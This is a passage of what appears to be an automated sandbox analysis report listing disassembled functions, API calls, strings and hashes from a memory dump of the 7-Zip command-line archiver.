                              • Opcode Fuzzy Hash: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                              • Instruction Fuzzy Hash: E8515326718B8482CB60DB2AD4903EE7361F7C5BA0F548212EB9E477A5DF7DC845DB01
                              Function 00F9FCA0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 104COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: -bit$DIRS$PGP$TAG$ZERO
                              • API String ID: 1294909896-2593822073
                              • Opcode ID: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                              • Instruction ID: 299ffc67f12a266ebc3b7221d566a8b146254627cfa86815d4cc364eac7ff0fc
                              • Opcode Fuzzy Hash: e5fe60c4106dc734c329ee4b6546d7a8d3d2cf1fbb7484c544a0f86324b991a4
                              • Instruction Fuzzy Hash: 36415863624581A1DF30EB24E8912AE7332F794788F844123E68D82969DB6CCB4DF742
                              Function 00FA2250 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 102COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00FA8580: wcscmp.MSVCRT ref: 00FA8642
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA866E
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA8678
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86B5
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86BD
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86CB
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA86F9
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA8701
                                • Part of subcall function 00FA8580: free.MSVCRT ref: 00FA870F
                              • free.MSVCRT ref: 00FA2331
                              • free.MSVCRT ref: 00FA233F
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FA23A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$mallocmemmovewcscmp
                              • String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
                              • API String ID: 1621466233-3656212537
                              • Opcode ID: 6c9bdc1de78805bbb2306098cde6168b63a4d46cc34950daf4f96901134a451d
                              • Instruction ID: b463641683f241b24b13f6a88c17d516f014978743b9af796ec688a3e3827e2a
                              • Opcode Fuzzy Hash: 6c9bdc1de78805bbb2306098cde6168b63a4d46cc34950daf4f96901134a451d
                              • Instruction Fuzzy Hash: 72413572609B8086CB20DB25F95039EFBE8F7D5B90F444226A6DE47BA8DB7CC551DB00
                              Function 00F7D5E8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 79stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7D298: GetModuleHandleW.KERNEL32 ref: 00F7D2D4
                                • Part of subcall function 00F7D298: GetProcAddress.KERNEL32 ref: 00F7D2ED
                                • Part of subcall function 00F7D298: free.MSVCRT ref: 00F7D40F
                                • Part of subcall function 00F7D298: free.MSVCRT ref: 00F7D41A
                                • Part of subcall function 00F7CC68: GetSystemInfo.KERNEL32 ref: 00F7CC88
                              • strcmp.MSVCRT ref: 00F7D66A
                              • free.MSVCRT ref: 00F7D6C9
                              • free.MSVCRT ref: 00F7D6D4
                              • free.MSVCRT ref: 00F7D6DF
                              • free.MSVCRT ref: 00F7D71B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$AddressHandleInfoModuleProcSystemstrcmp
                              • String ID: -
                              • API String ID: 3961349729-3695764949
                              • Opcode ID: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                              • Instruction ID: 29a7cbec03828ea6e62d6af54070abf831d687618f639407bd659330e246e8f5
                              • Opcode Fuzzy Hash: b7cbed1331cb7d55189943225399f2c26065b17822c77ed4446776fd064686b3
                              • Instruction Fuzzy Hash: 3431A42221464591CA60EB14EC5125EB730EBC17E4FC4A127F69F479B9CF7CC985EB02
                              Function 00FC23DC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FC2460
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfreememset
                              • String ID: Alternate streams$Alternate streams size$Files$Folders$Size
                              • API String ID: 3433497869-232602582
                              • Opcode ID: 78eaad3f6bac44cad1e749ca284a67a53ae437defbae0727eb7d7c1dfa618871
                              • Instruction ID: ae8c03af8b137169dbd32dba70acffd2300425b84f141a1b8172d029added84a
                              • Opcode Fuzzy Hash: 78eaad3f6bac44cad1e749ca284a67a53ae437defbae0727eb7d7c1dfa618871
                              • Instruction Fuzzy Hash: 3C31D461204A8242CA78EB26DB527AD7312F7827E0F44411BDB5E17AA3DF6CC595E341
                              Function 00F77130 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$FileMove
                              • String ID:
                              • API String ID: 288606353-0
                              • Opcode ID: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                              • Instruction ID: 3c57ac2a970767d8fc8d22ce6bddb650ff074b8605f6bddcd9ee68a29c13df2c
                              • Opcode Fuzzy Hash: 57cac637d8e0234f60b055ac2bc110f97c18c8dc58c2764d229503f95f95ff27
                              • Instruction Fuzzy Hash: EE11D81361978145CA60FA25EC5076F6710DBC2BE0F889223FEAE47265CE2DC886F712
                              Function 00F78510 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              • SetLastError.KERNEL32 ref: 00F7854A
                              • SetLastError.KERNEL32 ref: 00F78559
                              • FindFirstStreamW.KERNELBASE ref: 00F7857B
                              • GetLastError.KERNEL32 ref: 00F7858A
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast$Find$CloseFirstStream
                              • String ID:
                              • API String ID: 4071060300-0
                              • Opcode ID: 8bfca64d83042e558a50e630350950babcc7fcac76a9d470840084b0d5c37b5f
                              • Instruction ID: b28d8d94e7b913c54b3ce5bf36a5dba0538822de66fda0a453d497b759ff4342
                              • Opcode Fuzzy Hash: 8bfca64d83042e558a50e630350950babcc7fcac76a9d470840084b0d5c37b5f
                              • Instruction Fuzzy Hash: 4A21C723644A4191DB70AB21E80837D6361FB9A7B4F548332DEBE476D4DF3CC946E202
                              Function 00FBE5D8 Relevance: 9.1, APIs: 6, Instructions: 68timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: freememmove$CompareCriticalEnterFileSectionTime
                              • String ID:
                              • API String ID: 706800807-0
                              • Opcode ID: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                              • Instruction ID: f0fb52a9bb0d03b6b4126e28105e792428d5e457ad4256f831346ba9a9479431
                              • Opcode Fuzzy Hash: 58a0885f6d86d70a921f35c9044090e0a72a65f2069e27a2fc9408c344482038
                              • Instruction Fuzzy Hash: 93219CB361168196DB64DF3AD8843EC3361F324FA8F544226CA5E47298EF35C899DB40
                              Function 00FC1D3C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree$memset
                              • String ID: Name$Size
                              • API String ID: 219391080-481755742
                              • Opcode ID: 3c14805f01d802947681f6a0696c86943e9b18f330d9939bc2c229f69d0b0ac2
                              • Instruction ID: 32c4a610a1cbaf136a0f504c3c177883811b30c2e13ef56c2d2f4bea5eb3844e
                              • Opcode Fuzzy Hash: 3c14805f01d802947681f6a0696c86943e9b18f330d9939bc2c229f69d0b0ac2
                              • Instruction Fuzzy Hash: E841252261468682CB20DF26DA92B7D3361F346BE4F449126EF5A57746CF3CC9A2E301
                              Function 00FCD020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 00FCD052
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree
                              • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                              • API String ID: 2581285248-171671738
                              • Opcode ID: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                              • Instruction ID: 201270bf42a5d07ca77a3a497230cbda6a4daebc90497ce1a6dbfbd18f25cf44
                              • Opcode Fuzzy Hash: 646732ebcff86c9df6dad86610872ba6a7d61547c425be7e6e005f2518e3d884
                              • Instruction Fuzzy Hash: 4B31882260854787FB309B08DAE3BBD2361E7C47A8F48413BDA4E076A9DA5DCDD5B301
                              Function 00F711C0 Relevance: 8.8, APIs: 7, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: a060011340e0b4fa7eb17828ec7f5ed587f57dfbc6418dfc5958b8da2aae88f0
                              • Instruction ID: 4f0fcca071b68bfded02bd1a82d2b10509fd7779d64ec8694f34f8a6e2c5bf13
                              • Opcode Fuzzy Hash: a060011340e0b4fa7eb17828ec7f5ed587f57dfbc6418dfc5958b8da2aae88f0
                              • Instruction Fuzzy Hash: B531E322201A44A0CB50EF24EC5155D7720FBC5BE4F848223FE9E4B7A9DE2CC94AE711
                              Function 00FC636C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$fputc
                              • String ID: Time =
                              • API String ID: 1185151155-458291097
                              • Opcode ID: c5b619de66edff72bf4bed49fe2c3b64023da3196d5987dc98897d52cf62299b
                              • Instruction ID: 52dc43b67c34924dfdba5a5681a33283c3b1dfde6ab51c6b2035462515f0a7d9
                              • Opcode Fuzzy Hash: c5b619de66edff72bf4bed49fe2c3b64023da3196d5987dc98897d52cf62299b
                              • Instruction Fuzzy Hash: F8217855300A5386EB18AF1BED5177D6323AB98FD4F48A036DD1D57BA5DD38C886E300
                              Function 00FCBE98 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCBF9D
                              • free.MSVCRT ref: 00FCBFA9
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$freememset
                              • String ID: Archive size: $Files read from disk$Volumes:
                              • API String ID: 2276422817-73833580
                              • Opcode ID: ae8e3ac43625b987e17111058af675fbef41acd63832715c7d6967a8de69495a
                              • Instruction ID: cc9069852c4e03bde66901cf95cdfd4652c6e3165c3b67ae14669050af53787e
                              • Opcode Fuzzy Hash: ae8e3ac43625b987e17111058af675fbef41acd63832715c7d6967a8de69495a
                              • Instruction Fuzzy Hash: F821536220494690CF70EF24EC9179DB731E7C47A8F848627E64E475B9DF6CC68AD701
                              Function 00FB3110 Relevance: 8.8, APIs: 7, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                              • Instruction ID: 933aa1aa6a750a35f9d2cd2c38eae1b35a0962283884f09fea5cbad777e797d4
                              • Opcode Fuzzy Hash: 91324675b78ba19f9b05da73786a397c313983f0b342506a06a986321d12e703
                              • Instruction Fuzzy Hash: 4101F923B42A9885C7D0AF35CC016AC3310E781BF4F048322FE2D1B795CE2DC8229310
                              Function 00FC6DB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FC6DF0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FC6E22
                              • fputs.MSVCRT ref: 00FC6E40
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree$fputc
                              • String ID: : $----------------
                              • API String ID: 3584323934-4071417161
                              • Opcode ID: 56c94ac1bdf9cddbc9255c459408ded5eef17b0e86111f152ee530bdcc83312d
                              • Instruction ID: 4d1b60c82cc82f3e745a238541a614431c05eda52ed65d002d09640cf3f2e62c
                              • Opcode Fuzzy Hash: 56c94ac1bdf9cddbc9255c459408ded5eef17b0e86111f152ee530bdcc83312d
                              • Instruction Fuzzy Hash: 75016566700A0186DA64EF16EE9172E3322F784BE4F148237DE6E43795CE3CD446D711
                              Function 00FCBDE4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCBE42
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • fputs.MSVCRT ref: 00FCBE6F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$memset
                              • String ID: Creating archive: $StdOut$Updating archive:
                              • API String ID: 3543874852-1319951512
                              • Opcode ID: 0b67864523099296e8bc6b2fce80c013e843b0fedf7f6fccb8d94778e90d7f98
                              • Instruction ID: daaf63c6711c362bf29d535655995547a10be569554f92bc3b0e9ac0be7c391b
                              • Opcode Fuzzy Hash: 0b67864523099296e8bc6b2fce80c013e843b0fedf7f6fccb8d94778e90d7f98
                              • Instruction Fuzzy Hash: 78016D66701A4681EF58EF65DA967A92322EB44FE8F0884378E0E0B755DF29C489E310
                              Function 00FC40C0 Relevance: 8.8, APIs: 7, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                              • Instruction ID: 4ed6ceb88ad80004eda147fbcb32a949eb4e2075806a980749f0f532643fbeb9
                              • Opcode Fuzzy Hash: 45413b0386e91511af95a0f8a487d460f1c606b597beb1b450eac350a4d7b625
                              • Instruction Fuzzy Hash: E8F0A423B1195985CBD1BF36DD5216C2320AB85FE4F488123AF0D5F355CE2ECCA2A3A1
                              Function 00FCBFD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                              Download Yara Rule
                              APIs
                              • fputs.MSVCRT ref: 00FCC000
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • fputs.MSVCRT ref: 00FCC043
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FCC057
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree$fputc
                              • String ID: : $Write SFX:
                              • API String ID: 3584323934-2530961540
                              • Opcode ID: 271fccad81a3169efc2504b683d97d9b74a86316004f13c1e3d07cc192cc4a0e
                              • Instruction ID: 859bed7d2a4792fa9c84fd7065beeb932bc15392061e67b256e156a62b71bd17
                              • Opcode Fuzzy Hash: 271fccad81a3169efc2504b683d97d9b74a86316004f13c1e3d07cc192cc4a0e
                              • Instruction Fuzzy Hash: 27014462300A4181DB60DB26ED453A96321E788FF4F48D2339E6E577E9DE2CC586D300
                              Function 00F82E30 Relevance: 8.8, APIs: 7, Instructions: 21COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                              • Instruction ID: f6e7e9fb7006983734ba61ff074734cf1ed9c5d626c536e70b373eecc5eea351
                              • Opcode Fuzzy Hash: 6aac4f8b66112ccdebbd1d1905c744c767a0f8c1bc3804467cf2c6bc99579525
                              • Instruction Fuzzy Hash: 10E00B1261060981DBD4FF76DC9112C3324F7D5F44B5450139E1D5F225CD1ECC63A391
                              Function 00FB4C98 Relevance: 7.7, APIs: 6, Instructions: 210COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
